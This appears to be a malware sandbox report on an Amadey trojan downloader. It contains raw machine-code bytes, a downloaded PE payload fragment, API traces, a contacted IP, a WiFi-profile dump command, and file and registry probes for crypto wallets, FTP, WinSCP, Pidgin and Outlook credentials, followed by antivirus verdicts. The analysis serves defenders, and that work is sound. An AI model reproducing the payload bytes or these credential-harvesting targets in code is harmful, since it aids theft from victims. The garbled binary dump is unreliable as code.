ÌÌÌHƒì(A¸HkH à¸ès H lˆHƒÄ(éoæ ÌÌÌHƒì(A¸ HkH ð½èC H ¬ˆHƒÄ(é?æ ÌÌÌHƒì(A¸$H_kH `¿è H ìˆHƒÄ(éæ ÌÌÌHƒì(A¸HWkH Pºèã H ,‰HƒÄ(éßå ÌÌÌHƒì(A¸H?kH @²è³ H l‰HƒÄ(é¯å ÌÌÌHƒì(A¸HkH ðºèƒ H ¬‰HƒÄ(éå ÌÌÌHƒì(A¸HÿjH À¶èS H ì‰HƒÄ(éOå ÌÌÌHƒì(A¸HçjH ¼è# H ,ŠHƒÄ(éå ÌÌÌHƒì(E3ÀH¢ÈH C¸èö H oŠHƒÄ(éòä ÌÌÌÌÌÌHƒì(A¸ HŸjH ð³èà H ¬ŠHƒÄ(é¿ä ÌÌÌHƒì(A¸HjH @·è“ H ìŠHƒÄ(éä ÌÌÌHƒì(A¸HgjH ð²èc H ,‹HƒÄ(é_ä ÌÌÌHƒì(A¸ HGjH à½è3 H l‹HƒÄ(é/ä ÌÌÌHƒì(A¸LH/gH зè H ¬‹HƒÄ(éÿã ÌÌÌHƒì(A¸H×iH à·èÓ H ì‹HƒÄ(éÏã ÌÌÌHƒì(A¸dH?gH ð¸è£ H ,ŒHƒÄ(éŸã ÌÌÌHƒì(A¸H—iH à½ès H lŒHƒÄ(éoã ÌÌÌHƒì(A¸HiH P¼èC H ¬ŒHƒÄ(é?ã ÌÌÌHƒì(A¸ HgiH À·è H ìŒHƒÄ(éã ÌÌÌHƒì(A¸HGiH °³èã H ,HƒÄ(éßâ ÌÌÌHƒì(A¸HiH ¾è³ H lHƒÄ(é¯â ÌÌÌHƒì(A¸H÷hH °¶èƒ H ¬HƒÄ(éâ ÌÌÌHƒì(A¸HÏhH €´èS H ìHƒÄ(éOâ ÌÌÌHƒì(A¸H¯hH ð±è# H ,ŽHƒÄ(éâ ÌÌÌHƒì(A¸HhH `®èó H lŽHƒÄ(éïá ÌÌÌHƒì(A¸ HhH ·èà H ¬ŽHƒÄ(é¿á ÌÌÌHƒì(A¸0H_hH `¼è“ H ìŽHƒÄ(éá ÌÌÌHƒì(A¸ HghH P¼èc H ,HƒÄ(é_á ÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³c—jàc—jàc—jà8ÿiái—jà8ÿoáë—jà8ÿnáq—jà¶únál—jà¶úiár—jà¶úoáB—jà8ÿkád—jàc—kà—jàøùcá`—jàøùjáb—jàøù•àb—jàøùháb—jàRichc—jàPELûxgà! R´ rp@@€ÜœÝPø tPË8ˆË@pL.text–QR `.rdata”tpvV@@.dataìðÌ@À.rsrcøà@@.reloct â@Bj hˆ¾¹`øè/Oh8è\YÃÌÌÌj h¬¾¹xøèOh`8è}\YÃÌÌÌjhо¹øèïNhÀ8è]\YÃÌÌÌj hؾ¹¨øèÏNh 9è=\YÃÌÌÌjhü¾¹Àøè¯Nh€9è\YÃÌÌÌjh¿¹ØøèNhà9èý[YÃÌÌÌjh1¿¹ðøèoNh@:èÝ[YÃÌÌÌjh1¿¹ùèONh :è½[YÃÌÌÌjh1¿¹ ùè/Nh;è[YÃÌÌÌjh1¿¹8ùèNh`;è}[YÃÌÌÌjh4¿¹PùèïMhÀ;è][YÃÌÌÌjh@¿¹hùèÏMh <è=[YÃÌÌÌjhL¿¹€ùè¯Mh€<è[YÃÌÌÌjhX¿¹˜ùèMhà<èýZYÃÌÌÌj$hd¿¹°ùèoMh@=èÝZYÃÌÌÌjhŒ¿¹ÈùèOMh =è½ZYÃÌÌÌjh ¿¹àùè/Mh>èZYÃÌÌÌj hÀ¿¹øùèMh`>è}ZYÃÌÌÌjhп¹úèïLhÀ>è]ZYÃÌÌÌjhÜ¿¹(úèÏLh ?è=ZYÃÌÌÌjhð¿¹@úè¯Lh€?èZYÃÌÌÌj hü¿¹XúèLhà?èýYYÃÌÌÌjLhÀ¹púèoLh@@èÝYYÃÌÌÌjh`À¹ˆúèOLh @è½YYÃÌÌÌjdh€À¹ úè/LhAèYYÃÌÌÌjhèÀ¹¸úèLh`Aè}YYÃÌÌÌjhüÀ¹ÐúèïKhÀAè]YYÃÌÌÌj hÁ¹èúèÏKh Bè=YYÃÌÌÌj h(Á¹ûè¯Kh€BèYYÃÌÌÌj(h8Á¹ûèKhàBèýXYÃÌÌÌj hdÁ¹0ûèoKh@CèÝXYÃÌÌÌj htÁ¹HûèOKh Cè½XYÃÌÌÌjh„Á¹`ûè/KhDèXYÃÌÌÌjhÁ¹xûèKh`Dè}XYÃÌÌÌj h¬Á¹ûèïJhÀDè]XYÃÌÌÌj,h¼Á¹¨ûèÏJh Eè=XYÃÌÌÌjhìÁ¹Àûè¯Jh€EèXYÃÌÌÌj h¹ØûèJhàEèýWYÃÌÌÌj$h¹ðûèoJh@FèÝWYÃÌÌÌjh@¹üèOJh Fè½WYÃÌÌÌjhT¹ üè/JhGèWYÃÌÌÌjh`¹8üèJh`Gè}WYÃÌÌÌjhl¹PüèïIhÀGè]WYÃÌÌÌjh€Â¹hüèÏIh Hè=WYÃÌÌÌjh1¿¹€üè¯Ih€HèWYÃÌÌÌj h˜Â¹˜üèIhàHèýVYÃÌÌÌjh¨Â¹°üèoIh@IèÝVYÃÌÌÌjhÀ¹ÈüèOIh Iè½VYÃÌÌÌj h̹àüè/IhJèVYÃÌÌÌjLhÀ¹øüèIh`Jè}VYÃÌÌÌjhÀ¹ýèïHhÀJè]VYÃÌÌÌjdh€À¹(ýèÏHh Kè=VYÃÌÌÌjhܹ@ýè¯Hh€KèVYÃÌÌÌjhð¹XýèHhàKèýUYÃÌÌÌj hùpýèoHh@LèÝUYÃÌÌÌjhùˆýèOHh Lè½UYÃÌÌÌjhù ýè/HhMèUYÃÌÌÌjh$ù¸ýèHh`Mè}UYÃÌÌÌjh,ùÐýèïGhÀMè]UYÃÌÌÌjh8ùèýèÏGh Nè=UYÃÌÌÌjhDùþè¯Gh€NèUYÃÌÌÌj hdùþèGhàNèýTYÃÌÌÌj0htù0þèoGh@OèÝTYÃÌÌÌj h¨Ã¹HþèOGh Oè½TYÃÌÌÌjh¸Ã¹`þè/GhPèTYÃÌÌÌjhÄùxþèGh`Pè}TYÃÌÌÌj<hÐùþèïFhÀPè]TYÃÌÌÌj0hŨþèÏFh Qè=TYÃÌÌÌjhDĹÀþè¯Fh€QèTYÃÌÌÌj4hPĹØþèFhàQèýSYÃÌÌÌj8hˆÄ¹ðþèoFh@RèÝSYÃÌÌÌjhÄĹÿèOFh Rè½SYÃÌÌÌj<hÐĹ ÿè/FhSèSYÃÌÌÌj4hŹ8ÿèFh`Sè}SYÃÌÌÌj hHŹPÿèïEhÀSè]SYÃÌÌÌj@hXŹhÿèÏEh Tè=SYÃÌÌÌj8hœÅ¹€ÿè¯Eh€TèSYÃÌÌÌj hØŹ˜ÿèEhàTèýRYÃÌÌÌj4hèŹ°ÿèoEh@UèÝRYÃÌÌÌj,h ƹÈÿèOEh Uè½RYÃÌÌÌj hPƹàÿè/EhVèRYÃÌÌÌj4h`ƹøÿèEh`Vè}RYÃÌÌÌj(h˜Æ¹èïDhÀVè]RYÃÌÌÌj hÄƹ(èÏDh Wè=RYÃÌÌÌj4hÔƹ@è¯Dh€WèRYÃÌÌÌj(h ǹXèDhàWèýQYÃÌÌÌjh8ǹpèoDh@XèÝQYÃÌÌÌj<hDǹˆèODh Xè½QYÃÌÌÌj0h„ǹ è/DhYèQYÃÌÌÌjh¸Ç¹¸èDh`Yè}QYÃÌÌÌj<hÄǹÐèïChÀYè]QYÃÌÌÌj4hȹèèÏCh Zè=QYÃÌÌÌjh<ȹè¯Ch€ZèQYÃÌÌÌj0hHȹèChàZèýPYÃÌÌÌj(h|ȹ0èoCh@[èÝPYÃÌÌÌjh¨È¹HèOCh [è½PYÃÌÌÌ
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline netsh wlan show profiles
host 78.153.139.168
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
file C:\Windows\Tasks\Gxtuum.job
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Roaming\Litecoin\wallets
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Local\Temp\76c5995d57\.purple\accounts.xml
file C:\Windows\.purple\accounts.xml
file C:\Python27\.purple\accounts.xml
file C:\Windows\System32\.purple\accounts.xml
file C:\.purple\accounts.xml
file C:\SystemRoot\System32\.purple\accounts.xml
file C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file C:\Windows\Microsoft.NET\Framework\v4.0.30319\.purple\accounts.xml
file C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.purple\accounts.xml
file C:\Program Files (x86)\Microsoft Office\Office15\.purple\accounts.xml
file C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\.purple\accounts.xml
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file C:\Windows\SysWOW64\.purple\accounts.xml
file C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\.purple\accounts.xml
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server
registry HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Amadey.a!c
Cynet Malicious (score: 100)
CAT-QuickHeal Trojandownloader.Deyma
Skyhigh BehavesLike.Win32.Generic.hh
ALYac Gen:Variant.Zusy.535541
Cylance Unsafe
VIPRE Gen:Variant.Zusy.535541
Sangfor Downloader.Win32.Amadey.Vuku
CrowdStrike win/malicious_confidence_70% (D)
BitDefender Gen:Variant.Zusy.535541
K7GW Trojan-Downloader ( 005790d31 )
K7AntiVirus Trojan-Downloader ( 005790d31 )
Arcabit Trojan.Zusy.D82BF5
Baidu Win32.Trojan.Delf.in
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
APEX Malicious
Avast Win32:MalwareX-gen [Trj]
ClamAV Win.Malware.Generic-10033391-0
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba TrojanDownloader:Win32/Amadey.dcc40490
NANO-Antivirus Trojan.Win32.Redcap.ksraod
MicroWorld-eScan Gen:Variant.Zusy.535541
Rising Downloader.Amadey!8.125AC (CLOUD)
Emsisoft Gen:Variant.Zusy.535541 (B)
F-Secure Trojan.TR/Redcap.wksod
DrWeb Trojan.MulDrop28.29236
McAfeeD Real Protect-LS!689FF816FC3D
Trapmine malicious.high.ml.score
CTX exe.trojan.amadey
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.689ff816fc3db388
Webroot W32.Malware.Gen
Google Detected
Avira TR/Redcap.wksod
Antiy-AVL Trojan[Downloader]/Win32.Deyma
Kingsoft malware.kb.a.948
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Trojan:Win32/Amadey.BKC!MTB
ZoneAlarm HEUR:Trojan-Downloader.Win32.Deyma.gen
GData Gen:Variant.Zusy.535541
AhnLab-V3 Trojan/Win.Generic.R671687
VBA32 BScope.TrojanDownloader.Deyma
DeepInstinct MALICIOUS
Malwarebytes Malware.AI.1487355604
Ikarus Trojan-Downloader.Win32.Amadey
Panda Trj/GdSda.A